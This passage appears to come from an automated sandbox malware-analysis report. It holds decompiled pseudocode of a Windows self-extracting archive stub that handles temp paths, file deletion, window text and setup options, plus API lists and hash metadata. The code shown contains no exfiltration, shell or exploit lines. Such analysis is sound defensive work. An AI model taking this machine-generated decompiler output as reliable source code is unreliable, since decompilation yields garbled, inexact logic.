                                                    						return E00CD0602(_t65, L"00", _t44 - (_t59 - _t58 >> 1) - 2);
                                                    					}
                                                    					_t30 = E00CD047A( *(_t59 + 6) & 0x0000ffff);
                                                    					__eflags = _t30;
                                                    					if(_t30 == 0) {
                                                    						goto L30;
                                                    					}
                                                    					_t31 = E00CE3E13(_t59);
                                                    					_t47 = 0x3a;
                                                    					_t14 = _t31 - 1; // -1
                                                    					_t54 = _t59 + _t14 * 2;
                                                    					 *_t54 =  *_t54 + 1;
                                                    					__eflags =  *_t54 - _t47;
                                                    					if( *_t54 == _t47) {
                                                    						_t66 = 0x30;
                                                    						while(1) {
                                                    							__eflags = _t54 - _t58;
                                                    							if(_t54 <= _t58) {
                                                    								break;
                                                    							}
                                                    							_t33 =  *(_t54 - 2) & 0x0000ffff;
                                                    							_t62 = _t33;
                                                    							__eflags = _t33 - _v4;
                                                    							if(_t33 == _v4) {
                                                    								break;
                                                    							}
                                                    							 *_t54 = _t66;
                                                    							_t34 = _t62 + 1;
                                                    							_t54 = _t54 + 0xfffffffe;
                                                    							 *_t54 = _t34;
                                                    							__eflags = _t34 - _t47;
                                                    							if(_t34 == _t47) {
                                                    								continue;
                                                    							}
                                                    							return _t34;
                                                    						}
                                                    						_t32 = 0x61;
                                                    						 *_t54 = _t32;
                                                    						return _t32;
                                                    					}
                                                    				} else {
                                                    					_t31 = E00CCBA1E(0, __eflags, _t58);
                                                    					_t63 = _t31;
                                                    					_t48 = 0x3a;
                                                    					 *_t63 =  *_t63 + 1;
                                                    					__eflags =  *_t63 - _t48;
                                                    					if( *_t63 == _t48) {
                                                    						_t67 = 0x30;
                                                    						while(1) {
                                                    							_v4 = _t63;
                                                    							 *_t63 = _t67;
                                                    							_t63 = _t63 - 2;
                                                    							__eflags = _t63 - _t58;
                                                    							if(_t63 < _t58) {
                                                    								break;
                                                    							}
                                                    							_t39 = E00CD047A( *_t63 & 0x0000ffff);
                                                    							__eflags = _t39;
                                                    							if(_t39 == 0) {
                                                    								break;
                                                    							}
                                                    							 *_t63 =  *_t63 + 1;
                                                    							__eflags =  *_t63 - _t48;
                                                    							if( *_t63 == _t48) {
                                                    								continue;
                                                    							}
                                                    							return _t39;
                                                    						}
                                                    						_t56 = _t58 + E00CE3E13(_t58) * 2;
                                                    						while(1) {
                                                    							__eflags = _t56 - _t63;
                                                    							if(_t56 == _t63) {
                                                    								break;
                                                    							}
                                                    							 *((short*)(_t56 + 2)) =  *_t56;
                                                    							_t56 = _t56 - 2;
                                                    							__eflags = _t56;
                                                    						}
                                                    						_t37 = _v4;
                                                    						_t57 = 0x31;
                                                    						 *_t37 = _t57;
                                                    						return _t37;
                                                    					}
                                                    				}
                                                    				return _t31;
                                                    			}






























                                                    APIs
                                                      • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                      • Part of subcall function 00CCB92D: _wcsrchr.LIBVCRUNTIME ref: 00CCB944
                                                    • _wcslen.LIBCMT ref: 00CCC197
                                                    • _wcslen.LIBCMT ref: 00CCC1DF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcsrchr
                                                    • String ID: .exe$.rar$.sfx
                                                    • API String ID: 3513545583-31770016
                                                    • Opcode ID: d1febb07f671b0b801b1a84eb80f7360c5e779c6559f10bf1405384e151d06bc
                                                    • Instruction ID: 1b6b002f2aabfb91a04491bccd5b6ec8caa981fe83862c45f6b09dfa3b2a39ff
                                                    • Opcode Fuzzy Hash: d1febb07f671b0b801b1a84eb80f7360c5e779c6559f10bf1405384e151d06bc
                                                    • Instruction Fuzzy Hash: 3B413722500351A6C731AF75C882F7FB3B8EF40714F28094EFAA96B181EB619F81D391
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 62%
                                                    			E00CDCE87(intOrPtr __ebx, void* __ecx, void* __edx) {
                                                    				intOrPtr _t225;
                                                    				void* _t226;
                                                    				signed int _t292;
                                                    				void* _t294;
                                                    				signed int _t295;
                                                    				void* _t299;
                                                    
                                                    				L0:
                                                    				while(1) {
                                                    					L0:
                                                    					if(__ebx != 1) {
                                                    						goto L123;
                                                    					}
                                                    					L107:
                                                    					__eax = __ebp - 0x788c;
                                                    					__edi = 0x800;
                                                    					GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
                                                    					__eax = E00CCB690(__eflags, __ebp - 0x788c, 0x800);
                                                    					__ebx = 0;
                                                    					__esi = 0;
                                                    					_push(0);
                                                    					while(1) {
                                                    						L109:
                                                    						_push( *0xcfe724);
                                                    						__ebp - 0x788c = E00CC4092(0xd0946a, __edi, L"%s%s%u", __ebp - 0x788c);
                                                    						__eax = E00CCA231(0xd0946a);
                                                    						__eflags = __al;
                                                    						if(__al == 0) {
                                                    							break;
                                                    						}
                                                    						L108:
                                                    						__esi =  &(__esi->i);
                                                    						__eflags = __esi;
                                                    						_push(__esi);
                                                    					}
                                                    					L110:
                                                    					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xd0946a);
                                                    					__eflags =  *(__ebp - 0x588c) - __bx;
                                                    					if( *(__ebp - 0x588c) == __bx) {
                                                    						while(1) {
                                                    							L175:
                                                    							_push(0x1000);
                                                    							_t213 = _t299 - 0x15; // 0xffffa75f
                                                    							_t214 = _t299 - 0xd; // 0xffffa767
                                                    							_t215 = _t299 - 0x588c; // 0xffff4ee8
                                                    							_t216 = _t299 - 0xf894; // 0xfffeaee0
                                                    							_push( *((intOrPtr*)(_t299 + 0xc)));
                                                    							_t225 = E00CDB314(0x800, _t299);
                                                    							_t277 =  *((intOrPtr*)(_t299 + 0x10));
                                                    							 *((intOrPtr*)(_t299 + 0xc)) = _t225;
                                                    							if(_t225 != 0) {
                                                    								_t226 = _t299 - 0x588c;
                                                    								_t294 = _t299 - 0x1b894;
                                                    								_t292 = 6;
                                                    								goto L2;
                                                    							} else {
                                                    								break;
                                                    							}
                                                    							L4:
                                                    							while(E00CD1FBB(_t299 - 0xf894,  *((intOrPtr*)(0xcfe744 + _t295 * 4))) != 0) {
                                                    								_t295 = _t295 + 1;
                                                    								if(_t295 < 0xe) {
                                                    									continue;
                                                    								} else {
                                                    									goto L175;
                                                    								}
                                                    							}
                                                    							__eflags = _t295 - 0xd;
                                                    							if(__eflags > 0) {
                                                    								continue;
                                                    							}
                                                    							L8:
                                                    							switch( *((intOrPtr*)(_t295 * 4 +  &M00CDD41B))) {
                                                    								case 0:
                                                    									L9:
                                                    									__eflags = _t277 - 2;
                                                    									if(_t277 == 2) {
                                                    										E00CDA64D(_t299 - 0x788c, 0x800);
                                                    										E00CCA544(E00CCBDF3(__eflags, _t299 - 0x788c, _t299 - 0x588c, _t299 - 0xd894, 0x800), _t277, _t299 - 0x8894, _t295);
                                                    										 *(_t299 - 4) = 0;
                                                    										E00CCA67E(_t299 - 0x8894, _t299 - 0xd894);
                                                    										E00CC6EDB(_t299 - 0x388c);
                                                    										while(1) {
                                                    											L23:
                                                    											_push(0);
                                                    											_t240 = E00CCA5D1(_t299 - 0x8894, _t299 - 0x388c);
                                                    											__eflags = _t240;
                                                    											if(_t240 == 0) {
                                                    												break;
                                                    											}
                                                    											L11:
                                                    											SetFileAttributesW(_t299 - 0x388c, 0);
                                                    											__eflags =  *(_t299 - 0x2880);
                                                    											if(__eflags == 0) {
                                                    												L16:
                                                    												_t244 = GetFileAttributesW(_t299 - 0x388c);
                                                    												__eflags = _t244 - 0xffffffff;
                                                    												if(_t244 == 0xffffffff) {
                                                    													continue;
                                                    												}
                                                    												L17:
                                                    												_t246 = DeleteFileW(_t299 - 0x388c);
                                                    												__eflags = _t246;
                                                    												if(_t246 != 0) {
                                                    													continue;
                                                    												} else {
                                                    													_t297 = 0;
                                                    													_push(0);
                                                    													goto L20;
                                                    													L20:
                                                    													E00CC4092(_t299 - 0x1044, 0x800, L"%s.%d.tmp", _t299 - 0x388c);
                                                    													_t301 = _t301 + 0x14;
                                                    													_t251 = GetFileAttributesW(_t299 - 0x1044);
                                                    													__eflags = _t251 - 0xffffffff;
                                                    													if(_t251 != 0xffffffff) {
                                                    														_t297 = _t297 + 1;
                                                    														__eflags = _t297;
                                                    														_push(_t297);
                                                    														goto L20;
                                                    													} else {
                                                    														_t254 = MoveFileW(_t299 - 0x388c, _t299 - 0x1044);
                                                    														__eflags = _t254;
                                                    														if(_t254 != 0) {
                                                    															MoveFileExW(_t299 - 0x1044, 0, 4);
                                                    														}
                                                    														continue;
                                                    													}
                                                    												}
                                                    											}
                                                    											L12:
                                                    											E00CCB991(__eflags, _t299 - 0x788c, _t299 - 0x1044, 0x800);
                                                    											E00CCB690(__eflags, _t299 - 0x1044, 0x800);
                                                    											_t298 = E00CE3E13(_t299 - 0x788c);
                                                    											__eflags = _t298 - 4;
                                                    											if(_t298 < 4) {
                                                    												L14:
                                                    												_t265 = E00CCBDB4(_t299 - 0x588c);
                                                    												__eflags = _t265;
                                                    												if(_t265 != 0) {
                                                    													break;
                                                    												}
                                                    												L15:
                                                    												_t268 = E00CE3E13(_t299 - 0x388c);
                                                    												__eflags = 0;
                                                    												 *((short*)(_t299 + _t268 * 2 - 0x388a)) = 0;
                                                    												E00CDFFF0(0x800, _t299 - 0x44, 0, 0x1e);
                                                    												_t301 = _t301 + 0x10;
                                                    												 *((intOrPtr*)(_t299 - 0x40)) = 3;
                                                    												_push(0x14);
                                                    												_pop(_t271);
                                                    												 *((short*)(_t299 - 0x34)) = _t271;
                                                    												 *((intOrPtr*)(_t299 - 0x3c)) = _t299 - 0x388c;
                                                    												_push(_t299 - 0x44);
                                                    												 *0xd2307c();
                                                    												goto L16;
                                                    											}
                                                    											L13:
                                                    											_t276 = E00CE3E13(_t299 - 0x1044);
                                                    											__eflags = _t298 - _t276;
                                                    											if(_t298 > _t276) {
                                                    												goto L15;
                                                    											}
                                                    											goto L14;
                                                    										}
                                                    										L24:
                                                    										 *(_t299 - 4) =  *(_t299 - 4) | 0xffffffff;
                                                    										E00CCA55A(_t299 - 0x8894);
                                                    									}
                                                    									goto L175;
                                                    								case 1:
                                                    									L25:
                                                    									__eflags = __ebx;
                                                    									if(__ebx != 0) {
                                                    										goto L175;
                                                    									} else {
                                                    										__eax =  *0xd1fc94;
                                                    										__eflags = __eax;
                                                    										__ebx = __ebx & 0xffffff00 | __eax == 0x00000000;
                                                    										__eflags = __eax;
                                                    										if(__eax != 0) {
                                                    											__eax =  *0xd1fc94;
                                                    											_pop(__ecx);
                                                    											_pop(__ecx);
                                                    										}
                                                    										__bh =  *((intOrPtr*)(__ebp - 0xd));
                                                    										__eflags = __bh;
                                                    										if(__eflags == 0) {
                                                    											__eax = __ebp + 0xc;
                                                    											_push(__ebp + 0xc);
                                                    											__esi = E00CDB48E(__ecx, __edx, __eflags);
                                                    											__eax =  *0xd1fc94;
                                                    										} else {
                                                    											__esi = __ebp - 0x588c;
                                                    										}
                                                    										__eflags = __bl;
                                                    										if(__bl == 0) {
                                                    											__edi = __eax;
                                                    										}
                                                    										L33:
                                                    										__eax = E00CE3E13(__esi);
                                                    										__eax = __eax + __edi;
                                                    										_push(__eax);
                                                    										_push( *0xd1fc94);
                                                    										__eax = E00CE3E3E(__ecx, __edx);
                                                    										__esp = __esp + 0xc;
                                                    										__eflags = __eax;
                                                    										if(__eax == 0) {
                                                    											L37:
                                                    											__eflags = __bh;
                                                    											if(__bh == 0) {
                                                    												__eax = L00CE3E2E(__esi);
                                                    											}
                                                    											goto L175;
                                                    										}
                                                    										L34:
                                                    										 *0xd1fc94 = __eax;
                                                    										__eflags = __bl;
                                                    										if(__bl != 0) {
                                                    											__ecx = 0;
                                                    											__eflags = 0;
                                                    											 *__eax = __cx;
                                                    										}
                                                    										L36:
                                                    										__eax = E00CE7686(__eax, __esi);
                                                    										_pop(__ecx);
                                                    										_pop(__ecx);
                                                    										goto L37;
                                                    									}
                                                    								case 2:
                                                    									L39:
                                                    									__eflags = __ebx;
                                                    									if(__ebx == 0) {
                                                    										__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
                                                    									}
                                                    									goto L175;
                                                    								case 3:
                                                    									L41:
                                                    									__eflags = __ebx;
                                                    									if(__ebx != 0) {
                                                    										goto L175;
                                                    									}
                                                    									L42:
                                                    									__eflags =  *0xd0a472 - __di;
                                                    									if( *0xd0a472 != __di) {
                                                    										goto L175;
                                                    									}
                                                    									L43:
                                                    									__eax = 0;
                                                    									__edi = __ebp - 0x588c;
                                                    									_push(0x22);
                                                    									 *(__ebp - 0x1044) = __ax;
                                                    									_pop(__eax);
                                                    									__eflags =  *(__ebp - 0x588c) - __ax;
                                                    									if( *(__ebp - 0x588c) == __ax) {
                                                    										__edi = __ebp - 0x588a;
                                                    									}
                                                    									__eax = E00CE3E13(__edi);
                                                    									__esi = 0x800;
                                                    									__eflags = __eax - 0x800;
                                                    									if(__eax >= 0x800) {
                                                    										goto L175;
                                                    									} else {
                                                    										L46:
                                                    										__eax =  *__edi & 0x0000ffff;
                                                    										_push(0x5c);
                                                    										_pop(__ecx);
                                                    										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
                                                    										if(( *__edi & 0x0000ffff) != 0x2e) {
                                                    											L50:
                                                    											__eflags = __ax - __cx;
                                                    											if(__ax == __cx) {
                                                    												L62:
                                                    												__ebp - 0x1044 = E00CD0602(__ebp - 0x1044, __edi, __esi);
                                                    												__ebx = 0;
                                                    												__eflags = 0;
                                                    												L63:
                                                    												_push(0x22);
                                                    												_pop(__eax);
                                                    												__eax = __ebp - 0x1044;
                                                    												__eax = E00CE279B(__ebp - 0x1044, __ebp - 0x1044);
                                                    												_pop(__ecx);
                                                    												_pop(__ecx);
                                                    												__eflags = __eax;
                                                    												if(__eax != 0) {
                                                    													__eflags =  *(__eax + 2) - __bx;
                                                    													if( *(__eax + 2) == __bx) {
                                                    														__ecx = 0;
                                                    														__eflags = 0;
                                                    														 *__eax = __cx;
                                                    													}
                                                    												}
                                                    												__eax = __ebp - 0x1044;
                                                    												__edi = 0xd0a472;
                                                    												E00CD0602(0xd0a472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
                                                    												__eax = E00CDB1BE(__ebp - 0x1044, __esi);
                                                    												__esi = GetDlgItem( *(__ebp + 8), 0x66);
                                                    												__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
                                                    												__eax = SendMessageW(__esi, 0x143, __ebx, 0xd0a472); // executed
                                                    												__eax = __ebp - 0x1044;
                                                    												__eax = E00CE3E49(__ebp - 0x1044, 0xd0a472, __eax);
                                                    												_pop(__ecx);
                                                    												_pop(__ecx);
                                                    												__eflags = __eax;
                                                    												if(__eax != 0) {
                                                    													__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
                                                    												}
                                                    												goto L175;
                                                    											}
                                                    											L51:
                                                    											__eflags = __ax;
                                                    											if(__ax == 0) {
                                                    												L53:
                                                    												__eax = __ebp - 0x1c;
                                                    												__ebx = 0;
                                                    												_push(__ebp - 0x1c);
                                                    												_push(1);
                                                    												_push(0);
                                                    												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
                                                    												_push(0x80000002);
                                                    												__eax =  *0xd23028();
                                                    												__eflags = __eax;
                                                    												if(__eax == 0) {
                                                    													__eax = __ebp - 0x14;
                                                    													 *(__ebp - 0x14) = 0x1000;
                                                    													_push(__ebp - 0x14);
                                                    													__eax = __ebp - 0x1044;
                                                    													_push(__ebp - 0x1044);
                                                    													__eax = __ebp - 0x24;
                                                    													_push(__ebp - 0x24);
                                                    													_push(0);
                                                    													_push(L"ProgramFilesDir");
                                                    													_push( *(__ebp - 0x1c));
                                                    													__eax =  *0xd23024();
                                                    													_push( *(__ebp - 0x1c));
                                                    													 *0xd23008() =  *(__ebp - 0x14);
                                                    													__ecx = 0x7ff;
                                                    													__eax =  *(__ebp - 0x14) >> 1;
                                                    													__eflags = __eax - 0x7ff;
                                                    													if(__eax >= 0x7ff) {
                                                    														__eax = 0x7ff;
                                                    													}
                                                    													__ecx = 0;
                                                    													__eflags = 0;
                                                    													 *(__ebp + __eax * 2 - 0x1044) = __cx;
                                                    												}
                                                    												__eflags =  *(__ebp - 0x1044) - __bx;
                                                    												if( *(__ebp - 0x1044) != __bx) {
                                                    													__eax = __ebp - 0x1044;
                                                    													__eax = E00CE3E13(__ebp - 0x1044);
                                                    													_push(0x5c);
                                                    													_pop(__ecx);
                                                    													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
                                                    													if(__eflags != 0) {
                                                    														__ebp - 0x1044 = E00CD05DA(__eflags, __ebp - 0x1044, "\\", __esi);
                                                    													}
                                                    												}
                                                    												__esi = E00CE3E13(__edi);
                                                    												__eax = __ebp - 0x1044;
                                                    												__eflags = __esi - 0x7ff;
                                                    												__esi = 0x800;
                                                    												if(__eflags < 0) {
                                                    													__ebp - 0x1044 = E00CD05DA(__eflags, __ebp - 0x1044, __edi, 0x800);
                                                    												}
                                                    												goto L63;
                                                    											}
                                                    											L52:
                                                    											__eflags =  *((short*)(__edi + 2)) - 0x3a;
                                                    											if( *((short*)(__edi + 2)) == 0x3a) {
                                                    												goto L62;
                                                    											}
                                                    											goto L53;
                                                    										}
                                                    										L47:
                                                    										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
                                                    										if( *((intOrPtr*)(__edi + 2)) != __cx) {
                                                    											goto L51;
                                                    										}
                                                    										L48:
                                                    										__edi = __edi + 4;
                                                    										__ebx = 0;
                                                    										__eflags =  *__edi - __bx;
                                                    										if( *__edi == __bx) {
                                                    											goto L175;
                                                    										}
                                                    										L49:
                                                    										__ebp - 0x1044 = E00CD0602(__ebp - 0x1044, __edi, 0x800);
                                                    										goto L63;
                                                    									}
                                                    								case 4:
                                                    									L68:
                                                    									__eflags =  *0xd0a46c - 1;
                                                    									__eflags = __eax - 0xd0a46c;
                                                    									 *__edi =  *__edi + __ecx;
                                                    									__eflags =  *(__edx + 7) & __al;
                                                    									 *__eax =  *__eax + __al;
                                                    									__eflags =  *__eax;
                                                    								case 5:
                                                    									L73:
                                                    									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                                                    									__ecx = 0;
                                                    									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                                                    									__eflags = __eax;
                                                    									if(__eax == 0) {
                                                    										L80:
                                                    										 *0xd08457 = __cl;
                                                    										 *0xd08460 = 1;
                                                    										goto L175;
                                                    									}
                                                    									L74:
                                                    									__eax = __eax - 0x30;
                                                    									__eflags = __eax;
                                                    									if(__eax == 0) {
                                                    										L78:
                                                    										 *0xd08457 = __cl;
                                                    										L79:
                                                    										 *0xd08460 = __cl;
                                                    										goto L175;
                                                    									}
                                                    									L75:
                                                    									__eax = __eax - 1;
                                                    									__eflags = __eax;
                                                    									if(__eax == 0) {
                                                    										goto L80;
                                                    									}
                                                    									L76:
                                                    									__eax = __eax - 1;
                                                    									__eflags = __eax;
                                                    									if(__eax != 0) {
                                                    										goto L175;
                                                    									}
                                                    									L77:
                                                    									 *0xd08457 = 1;
                                                    									goto L79;
                                                    								case 6:
                                                    									L86:
                                                    									__edi = 0;
                                                    									 *0xd0c577 = 1;
                                                    									__edi = 1;
                                                    									__eax = __ebp - 0x588c;
                                                    									__eflags =  *(__ebp - 0x588c) - 0x3c;
                                                    									__ebx = __esi;
                                                    									 *(__ebp - 0x14) = __eax;
                                                    									if( *(__ebp - 0x588c) != 0x3c) {
                                                    										L97:
                                                    										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
                                                    										if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
                                                    											L100:
                                                    											__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
                                                    											if( *((intOrPtr*)(__ebp + 0x10)) != 4) {
                                                    												goto L175;
                                                    											}
                                                    											L101:
                                                    											__eflags = __ebx - 6;
                                                    											if(__ebx != 6) {
                                                    												goto L175;
                                                    											}
                                                    											L102:
                                                    											__ecx = 0;
                                                    											__eflags = 0;
                                                    											_push(0);
                                                    											L103:
                                                    											_push(__edi);
                                                    											_push(__eax);
                                                    											_push( *(__ebp + 8));
                                                    											__eax = E00CDD78F(__ebp);
                                                    											goto L175;
                                                    										}
                                                    										L98:
                                                    										__eflags = __ebx - 9;
                                                    										if(__ebx != 9) {
                                                    											goto L175;
                                                    										}
                                                    										L99:
                                                    										_push(1);
                                                    										goto L103;
                                                    									}
                                                    									L87:
                                                    									__eax = __ebp - 0x588a;
                                                    									_push(0x3e);
                                                    									_push(__ebp - 0x588a);
                                                    									__eax = E00CE22C6(__ecx);
                                                    									_pop(__ecx);
                                                    									_pop(__ecx);
                                                    									__eflags = __eax;
                                                    									if(__eax == 0) {
                                                    										L96:
                                                    										__eax =  *(__ebp - 0x14);
                                                    										goto L97;
                                                    									}
                                                    									L88:
                                                    									_t103 = __eax + 2; // 0x2
                                                    									__ecx = _t103;
                                                    									 *(__ebp - 0x14) = _t103;
                                                    									__ecx = 0;
                                                    									 *__eax = __cx;
                                                    									__eax = __ebp - 0x10c;
                                                    									_push(0x64);
                                                    									_push(__ebp - 0x10c);
                                                    									__eax = __ebp - 0x588a;
                                                    									_push(__ebp - 0x588a);
                                                    									__eax = E00CDAF98();
                                                    									 *(__ebp - 0x20) = __eax;
                                                    									__eflags = __eax;
                                                    									if(__eax == 0) {
                                                    										goto L96;
                                                    									}
                                                    									L89:
                                                    									__esi = __eax;
                                                    									while(1) {
                                                    										L90:
                                                    										__eflags =  *(__ebp - 0x10c);
                                                    										if( *(__ebp - 0x10c) == 0) {
                                                    											goto L96;
                                                    										}
                                                    										L91:
                                                    										__eax = __ebp - 0x10c;
                                                    										__eax = E00CD1FBB(__ebp - 0x10c, L"HIDE");
                                                    										__eax =  ~__eax;
                                                    										asm("sbb eax, eax");
                                                    										__edi = __edi & __eax;
                                                    										__eax = __ebp - 0x10c;
                                                    										__eax = E00CD1FBB(__ebp - 0x10c, L"MAX");
                                                    										__eflags = __eax;
                                                    										if(__eax == 0) {
                                                    											_push(3);
                                                    											_pop(__edi);
                                                    										}
                                                    										__eax = __ebp - 0x10c;
                                                    										__eax = E00CD1FBB(__ebp - 0x10c, L"MIN");
                                                    										__eflags = __eax;
                                                    										if(__eax == 0) {
                                                    											_push(6);
                                                    											_pop(__edi);
                                                    										}
                                                    										_push(0x64);
                                                    										__eax = __ebp - 0x10c;
                                                    										_push(__ebp - 0x10c);
                                                    										_push(__esi);
                                                    										__esi = E00CDAF98();
                                                    										__eflags = __esi;
                                                    										if(__esi != 0) {
                                                    											continue;
                                                    										} else {
                                                    											goto L96;
                                                    										}
                                                    									}
                                                    									goto L96;
                                                    								case 7:
                                                    									goto L0;
                                                    								case 8:
                                                    									L127:
                                                    									__eflags = __ebx - 3;
                                                    									if(__ebx == 3) {
                                                    										__eflags =  *(__ebp - 0x588c) - __di;
                                                    										if(__eflags != 0) {
                                                    											__eax = __ebp - 0x588c;
                                                    											_push(__ebp - 0x588c);
                                                    											__eax = E00CE7625(__ebx, __edi);
                                                    											_pop(__ecx);
                                                    											 *0xd1fc9c = __eax;
                                                    										}
                                                    										__eax = __ebp + 0xc;
                                                    										_push(__ebp + 0xc);
                                                    										 *0xd1fc98 = E00CDB48E(__ecx, __edx, __eflags);
                                                    									}
                                                    									 *0xd0c576 = 1;
                                                    									goto L175;
                                                    								case 9:
                                                    									L132:
                                                    									__eflags = __ebx - 6;
                                                    									if(__ebx != 6) {
                                                    										goto L175;
                                                    									}
                                                    									L133:
                                                    									__eax = 0;
                                                    									 *(__ebp - 0x2844) = __ax;
                                                    									__eax =  *(__ebp - 0x1b894) & 0x0000ffff;
                                                    									__eax = E00CE79E9( *(__ebp - 0x1b894) & 0x0000ffff);
                                                    									__eflags = __eax - 0x50;
                                                    									if(__eax == 0x50) {
                                                    										 *(__ebp - 0x14) = 2;
                                                    										__eax = 0xd1cb82;
                                                    									} else {
                                                    										__eflags = __eax - 0x54;
                                                    										if(__eax == 0x54) {
                                                    											 *(__ebp - 0x14) = 7;
                                                    											__eax = 0xd1bb82;
                                                    										} else {
                                                    											 *(__ebp - 0x14) = 0x10;
                                                    											__eax = 0xd1db82;
                                                    										}
                                                    									}
                                                    									__esi = 0x800;
                                                    									__ebp - 0x2844 = E00CD0602(__ebp - 0x2844, __ebp - 0x2844, 0x800);
                                                    									__eax = 0;
                                                    									 *(__ebp - 0x9894) = __ax;
                                                    									 *(__ebp - 0x1844) = __ax;
                                                    									__ebp - 0x19894 = __ebp - 0x688c;
                                                    									__eax = E00CD0602(__ebp - 0x688c, __ebp - 0x19894, 0x800);
                                                    									_push(0x22);
                                                    									_pop(__ebx);
                                                    									__eflags =  *(__ebp - 0x688c) - __bx;
                                                    									if( *(__ebp - 0x688c) != __bx) {
                                                    										L141:
                                                    										__ebp - 0x688c = E00CCA231(__ebp - 0x688c);
                                                    										__eflags = __al;
                                                    										if(__al != 0) {
                                                    											goto L160;
                                                    										}
                                                    										L142:
                                                    										__ax =  *(__ebp - 0x688c);
                                                    										__esi = __ebp - 0x688c;
                                                    										__ebx = __edi;
                                                    										__eflags = __ax;
                                                    										if(__ax == 0) {
                                                    											L159:
                                                    											__esi = 0x800;
                                                    											goto L160;
                                                    										}
                                                    										L143:
                                                    										__edi = __ax & 0x0000ffff;
                                                    										do {
                                                    											L144:
                                                    											_push(0x20);
                                                    											_pop(__eax);
                                                    											__eflags = __di - __ax;
                                                    											if(__di == __ax) {
                                                    												L146:
                                                    												__eax = 0;
                                                    												__esi->i = __ax;
                                                    												__ebp - 0x688c = E00CCA231(__ebp - 0x688c);
                                                    												__eflags = __al;
                                                    												if(__al == 0) {
                                                    													L155:
                                                    													__esi->i = __di;
                                                    													goto L156;
                                                    												}
                                                    												L147:
                                                    												__ebp - 0x688c = E00CCA243(__ebp - 0x688c);
                                                    												__eax = E00CCA28F(__eax);
                                                    												__eflags = __al;
                                                    												if(__al != 0) {
                                                    													goto L155;
                                                    												}
                                                    												L148:
                                                    												_push(0x2f);
                                                    												_pop(__ecx);
                                                    												__eax =  &(__esi->i);
                                                    												__ebx = __esi;
                                                    												__eflags = __di - __cx;
                                                    												if(__di != __cx) {
                                                    													L150:
                                                    													_push(0x20);
                                                    													__esi = __eax;
                                                    													_pop(__eax);
                                                    													while(1) {
                                                    														L152:
                                                    														__eflags = __esi->i - __ax;
                                                    														if(__esi->i != __ax) {
                                                    															break;
                                                    														}
                                                    														L151:
                                                    														__esi =  &(__esi->i);
                                                    														__eflags = __esi;
                                                    													}
                                                    													L153:
                                                    													__ecx = __ebp - 0x1844;
                                                    													__eax = __esi;
                                                    													__edx = 0x400;
                                                    													L154:
                                                    													__eax = E00CD0602(__ecx, __eax, __edx);
                                                    													 *__ebx = __di;
                                                    													goto L156;
                                                    												}
                                                    												L149:
                                                    												 *(__ebp - 0x1844) = __cx;
                                                    												__edx = 0x3ff;
                                                    												__ecx = __ebp - 0x1842;
                                                    												goto L154;
                                                    											}
                                                    											L145:
                                                    											_push(0x2f);
                                                    											_pop(__eax);
                                                    											__eflags = __di - __ax;
                                                    											if(__di != __ax) {
                                                    												goto L156;
                                                    											}
                                                    											goto L146;
                                                    											L156:
                                                    											__esi =  &(__esi->i);
                                                    											__eax = __esi->i & 0x0000ffff;
                                                    											__edi = __esi->i & 0x0000ffff;
                                                    											__eflags = __ax;
                                                    										} while (__ax != 0);
                                                    										__esi = 0x800;
                                                    										__eflags = __ebx;
                                                    										if(__ebx != 0) {
                                                    											__eax = 0;
                                                    											 *__ebx = __ax;
                                                    										}
                                                    										goto L160;
                                                    									} else {
                                                    										L139:
                                                    										__ebp - 0x19892 = __ebp - 0x688c;
                                                    										E00CD0602(__ebp - 0x688c, __ebp - 0x19892, 0x800) = __ebp - 0x688a;
                                                    										_push(__ebx);
                                                    										_push(__ebp - 0x688a);
                                                    										__eax = E00CE22C6(__ecx);
                                                    										_pop(__ecx);
                                                    										_pop(__ecx);
                                                    										__eflags = __eax;
                                                    										if(__eax != 0) {
                                                    											__ecx = 0;
                                                    											 *__eax = __cx;
                                                    											__ebp - 0x1844 = E00CD0602(__ebp - 0x1844, __ebp - 0x1844, 0x400);
                                                    										}
                                                    										L160:
                                                    										__eflags =  *((short*)(__ebp - 0x11894));
                                                    										if( *((short*)(__ebp - 0x11894)) != 0) {
                                                    											__ebp - 0x9894 = __ebp - 0x11894;
                                                    											__eax = E00CCB6C4(__ebp - 0x11894, __ebp - 0x9894, __esi);
                                                    										}
                                                    										__ebp - 0xb894 = __ebp - 0x688c;
                                                    										__eax = E00CCB6C4(__ebp - 0x688c, __ebp - 0xb894, __esi);
                                                    										__eflags =  *(__ebp - 0x2844);
                                                    										if(__eflags == 0) {
                                                    											__ebp - 0x2844 = E00CDB425(__ecx, __ebp - 0x2844,  *(__ebp - 0x14));
                                                    										}
